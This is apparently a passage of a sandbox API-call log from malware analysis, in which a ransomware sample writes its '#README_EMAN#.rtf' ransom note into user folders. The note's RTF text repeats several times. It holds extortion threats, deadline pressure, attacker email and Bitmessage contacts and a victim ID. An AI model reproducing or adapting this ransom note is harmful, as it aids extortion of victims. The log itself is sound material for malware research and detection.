\\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nu y5\x97>\x13¹\x0cgR6÷Æ\x1dáh\x8f\"ûT¹\x9fcN", lpUsedDefaultChar=0x0) returned 8717 [0278.193] WriteFile (in: hFile=0x294, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.194] CloseHandle (hObject=0x294) returned 1 [0278.194] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_cn\\#readme_eman#.rtf")) returned 0xffffffff [0278.194] GetLastError () returned 0x2 [0278.194] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_cn\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0278.195] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.195] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.195] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of 